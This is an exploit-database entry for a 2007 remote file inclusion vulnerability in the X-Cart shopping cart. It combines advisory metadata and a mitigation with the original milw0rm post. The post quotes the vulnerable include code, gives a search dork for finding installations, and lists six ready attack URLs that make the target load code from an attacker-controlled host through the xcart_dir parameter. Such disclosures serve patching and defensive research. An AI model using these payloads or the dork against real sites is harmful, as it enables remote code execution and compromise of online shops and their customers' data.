xCart Remote file inclusion

vendor:

X-Cart

by:

aLiiF a.k.a [arif]

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: X-Cart

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:x-cart:x-cart

Metasploit:

Other Scripts:

Platforms Tested:

2007

xCart Remote file inclusion

The xCart application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting a remote file path in the xcart_dir parameter of various PHP files. This can lead to the execution of arbitrary code or unauthorized access to sensitive information.

Mitigation:

Update to the latest version of xCart to fix this vulnerability. Ensure that user input is properly validated and sanitized to prevent remote file inclusion.

Source

Exploit-DB raw data:

## xCart Remote file inclusion ##

## Download script : http://www.x-cart.com//

## Discovered By : aLiiF a.k.a [arif] @debuteam 07/09/2007

## HomePage : http://www.debuteam.net//

## Thx to : Debu Newbie Payment Yogac nyubi Rozi ^S0n_g0ku^
Kuris Sonix Toxicity newbi3 R4yn4ld0 DisJocKey
s3ng0k home_edition Holong home_edition2001
th0nk Scr3W_W0rm jayoes and aLL @Debutem @Mildnet



########### ###########
## ##
## 333 444555 HH HH KK K ##
## 333 3332222 444 555 1133311 HH HH KK K ##
## 333 33322222 444 55 11 11 HH HH #### 00000 KKKK ##
## 333 333 22 444 55 11 11 HHaaHH ## 00 KKK ##
## 333 333 22 444 55 11 11 HH HH ##### 00 KKKK ##
## 333 333 22 444 555 11 11 HH HH # ## 00 KK K ##
## 333 333 22 444555 1133311 HH HH ##### 00000 KK K ##
## ##
########## ##########



/*****************************************************************************\
+-----------------------------------------------------------------------------+
| X-Cart |
| Copyright (c) 2001-2004 Ruslan R. Fazliev <rrf@rrf.ru> |
| All rights reserved. |
+-----------------------------------------------------------------------------+
#
# $Id: config.php,v 1.297.2.9 2004/02/05 12:25:43 mclap Exp $
#
# Global definitions & common functions
#

@include $xcart_dir."/prepare.php";

#
# Create Smarty object
#
if (!@include $xcart_dir."/smarty.php") {


#################################################################################


## Dork : "X-CART. Powerful PHP shopping cart software" ##
## ##


=-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-=


## http://www.target.com/[xcart-path]/config.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/prepare.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/smarty.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/customer/product.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/provider/auth.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/admin/auth.php?xcart_dir=http://urhost/[inject]?

===================================================================


## Contack person : aliif@debuteam.net

## ViVa Debuteam !!! 

# milw0rm.com [2007-09-11]